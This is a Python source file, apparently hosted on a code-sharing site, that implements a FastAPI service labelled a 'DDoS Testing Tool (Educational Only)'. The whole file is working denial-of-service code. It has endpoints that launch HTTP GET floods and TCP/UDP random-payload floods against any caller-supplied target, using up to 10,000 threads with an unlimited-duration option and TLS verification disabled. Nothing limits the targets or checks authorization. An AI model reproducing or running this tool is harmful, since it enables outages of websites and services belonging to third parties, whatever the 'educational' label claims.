dstat / main.py
rkihacker's picture
Update main.py
db20d98 verified
# main.py
import uvicorn
from fastapi import FastAPI, HTTPException
from pydantic import BaseModel, conint, constr
import threading
import requests
import time
import logging
import socket
import random
from concurrent.futures import ThreadPoolExecutor
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
app = FastAPI(title="DDoS Testing Tool (Educational Only)")
# Global attack control
attack_active = False
attack_thread = None
executor = ThreadPoolExecutor(max_workers=10000) # Maximum power mode
class Layer7Config(BaseModel):
target: str
port: int = 80
duration: int = 30 # -1 for unlimited
threads: int = 100 # -1 for unlimited
class Layer4Config(BaseModel):
target: str
port: int = 80
duration: int = 30 # -1 for unlimited
threads: int = 100 # -1 for unlimited
protocol: constr(regex='^(tcp|udp)$') = "tcp"
payload_size: int = 1024
def generate_payload(size: int) -> bytes:
"""Generate random payload for Layer 4 attacks"""
return bytes(random.getrandbits(8) for _ in range(size))
def layer7_attack(target_url: str):
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"Cache-Control": "no-cache",
"Pragma": "no-cache"
}
session = requests.Session()
while attack_active:
try:
session.get(target_url, headers=headers, timeout=5, verify=False)
except:
pass
def layer4_attack(target_ip: str, port: int, protocol: str, payload_size: int):
sock = None
try:
if protocol == "tcp":
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.connect((target_ip, port))
else: # udp
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while attack_active:
payload = generate_payload(payload_size)
if protocol == "tcp":
sock.send(payload)
else:
sock.sendto(payload, (target_ip, port))
time.sleep(0.01) # Small delay to prevent CPU overload
except Exception as e:
logger.error(f"Layer 4 attack error: {e}")
finally:
if sock:
sock.close()
def start_layer7_attack(config: Layer7Config):
global attack_active
attack_active = True
# Determine thread count
thread_count = config.threads if config.threads != -1 else 10000
# Build target URL
protocol = "https" if config.target.startswith("https") else "http"
target_url = f"{config.target}:{config.port}"
logger.info(f"Starting Layer 7 attack on {target_url} with {thread_count} threads")
for _ in range(thread_count):
executor.submit(layer7_attack, target_url)
# Handle unlimited duration (-1)
if config.duration != -1:
time.sleep(config.duration)
stop_attack()
else:
logger.info("Layer 7 attack running indefinitely until manually stopped")
def start_layer4_attack(config: Layer4Config):
global attack_active
attack_active = True
# Determine thread count
thread_count = config.threads if config.threads != -1 else 10000
# Extract IP from target URL
try:
target_ip = socket.gethostbyname(config.target.split("//")[-1].split("/")[0])
except:
raise HTTPException(status_code=400, detail="Invalid target URL")
logger.info(f"Starting {config.protocol.upper()} attack on {target_ip}:{config.port} with {thread_count} threads")
for _ in range(thread_count):
executor.submit(layer4_attack, target_ip, config.port, config.protocol, config.payload_size)
# Handle unlimited duration (-1)
if config.duration != -1:
time.sleep(config.duration)
stop_attack()
else:
logger.info(f"{config.protocol.upper()} attack running indefinitely until manually stopped")
def stop_attack():
global attack_active
attack_active = False
logger.info("Attack stopped.")
@app.post("/layer7/attack")
def launch_layer7_attack(config: Layer7Config):
global attack_thread
if attack_thread and attack_thread.is_alive():
raise HTTPException(status_code=400, detail="Attack already in progress")
# Validate thread count
if config.threads != -1 and config.threads > 10000:
raise HTTPException(status_code=400, detail="Max 10,000 threads allowed (use -1 for unlimited)")
# Validate duration
if config.duration != -1 and config.duration > 5000:
raise HTTPException(status_code=400, detail="Max duration 5000 seconds (use -1 for unlimited)")
attack_thread = threading.Thread(target=start_layer7_attack, args=(config,), daemon=True)
attack_thread.start()
return {"status": "layer7_attack_started", "config": config}
@app.post("/layer4/attack")
def launch_layer4_attack(config: Layer4Config):
global attack_thread
if attack_thread and attack_thread.is_alive():
raise HTTPException(status_code=400, detail="Attack already in progress")
# Validate thread count
if config.threads != -1 and config.threads > 10000:
raise HTTPException(status_code=400, detail="Max 10,000 threads allowed (use -1 for unlimited)")
# Validate duration
if config.duration != -1 and config.duration > 5000:
raise HTTPException(status_code=400, detail="Max duration 5000 seconds (use -1 for unlimited)")
# Validate payload size
if config.payload_size > 65507:
raise HTTPException(status_code=400, detail="Max payload size is 65507 bytes")
attack_thread = threading.Thread(target=start_layer4_attack, args=(config,), daemon=True)
attack_thread.start()
return {"status": f"{config.protocol}_attack_started", "config": config}
@app.post("/stop")
def stop():
stop_attack()
return {"status": "attack_stopped"}
@app.get("/status")
def status():
return {"attack_active": attack_active}
if __name__ == "__main__":
uvicorn.run(app, host="0.0.0.0", port=8000)